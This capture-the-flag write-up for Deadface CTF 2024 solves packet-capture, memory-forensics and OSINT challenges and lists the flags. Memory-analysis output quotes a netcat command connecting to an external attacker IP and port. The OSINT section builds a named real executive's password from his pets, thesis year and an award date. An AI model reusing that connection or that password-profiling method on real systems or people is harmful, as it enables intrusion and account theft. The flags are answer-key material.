Deadface CTF 2024

Deadface CTF 2024 Writeup

DEADFACE CTFCyber Hacktics

---

Forensic challenges

Big Fish

PCAP analysis:

Wireshark > Export Object > HTTP// Some code

Netcat is downloaded after the POST request to notice.html

flag{45.55.201.188}

Password

PCAP Analysis:

flag{S4rt0RIS19&&}

Suscpicious Sender

Content of frame 13010:

please follow the on-screen instructions to update the agent and ensure your system is compliant with company standards.</p>

             <p>If you encounter any issues or require assistance, feel free to contact our IT support team.</p>

             <p>Thank you for your attention to this matter.</p>

             <p>Sincerely,</p>

             <p><strong>William Hadderly</strong><br>IT Support Manager<br>Techno Global Research Industries</p>

         </div>

         <div class="email-footer">

             <p>© 2024 Techno Global Research Industries. All rights reserved.</p>

         </div>

     </div>

</div>

</body>

</html

flag{William Hadderly}

---

Traffic Analysis

Wild Wild West

PCAP analysis

Export SMB objects - Deadface.txt

flag{kerbrute_finding_users}

---

Phantom Operation

Right Time

Memory forensic:

$ volatility3 -f physmem.raw windows.info

<-SNIP->

SystemTime 2024-10-06 23:38:00

flag{2024-10-06 23:38:00+00:00}

Bad Processes

Flag = PID of the malicious process executed by the victim

$ volatility3 -f physmem.raw windows.pslist

11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A Disabled
11540 11532 conhost.exe 0xe7878387f080 3 - 1 False 2024-10-06 23:26:52.000000 N/A Disabled
11332 628 svchost.exe 0xe7878178b080 10 - 0 False 2024-10-06 23:30:50.000000 N/A Disabled
12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A Disabled
11828 628 svchost.exe 0xe7877f9da080 4 - 0 False 2024-10-06 23:37:08.000000 N/A Disabled

1sass.exe and 945f.exe

volatility3 -f physmem.raw windows.pstree

<-SNIP->
  
*** 8460 4108 winupdate.exe 0xe78781c2a080 2 - 1 False 2024-10-06 23:26:47.000000 N/A \Device\HarddiskVolume2\Users\garry\Downloads\update\winupdate.exe "C:\Users\garry\Downloads\update\winupdate.exe" C:\Users\garry\Downloads\update\winupdate.exe

**** 11516 8460 1sass.exe 0xe7878358b080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\Temp\1sass.exe "C:\Windows\Temp\1sass.exe" C:\Windows\Temp\1sass.exe

***** 11532 11516 cmd.exe 0xe78783749080 1 - 1 True 2024-10-06 23:26:52.000000 N/A \Device\HarddiskVolume2\Windows\SysWOW64\cmd.exe cmd C:\Windows\SysWOW64\cmd.exe

****** 12260 11532 945f.exe 0xe78781691080 1 - 1 True 2024-10-06 23:36:41.000000 N/A \Device\HarddiskVolume2\Users\garry\945f.exe .\945f.exe  45.55.201.188 7523 C:\Users\garry\945f.exe

<-SNIP->

Netcat use port 7523 after a lsass dump lunched by winupdate.exe PID 8460

flag{8460}

System Information

The attacker obtained the victim's system information; identify the file where this information was stored.

$ volatility3 -f physmem.raw windows.filescan

<-SNIP->

0xe78782eabca0 \Windows\Temp\sysinfo.txt 216

<-SNIP->

flag{C:\Windows\Temp\sysinfo.txt}

---

OSINT

A hacker group claims that they were able to identify Albert Bourla's password by looking into his background.

The flag format is flag{pet dog's name1*thesis publication year$pet dog's name2+Golden Cross of the Order of the Redeemer receipt date (MM-DD-YYYYY)}

Dog's name:

Happy National Pet Day! Today, we’re giving Simba and Charlie some extra hugs (and treats) to celebrate the incredible joy they have brought to our family over the past few years. We simply couldn’t… | Albert Bourla | 51 commentslinkedin

Golden Cross of the Order of the Redeemer:

“On April 5, 2022, Chairman and CEO of Pfizer Albert Bourla was honored with Greece's top civilian award for his efforts in developing a life-saving COVID-19 vaccine. Greek President Katerina Sakellaropoulou presented Dr. Bourla with the Golden Cross of the Order of the Redeemer,”

Thesis publication year:

Albert BourlaWikipedia

“Bourla's doctoral thesis (1991) is titled "Effect of melatonin implants on”

flag{charlie*1991$Simba+04-05-2022}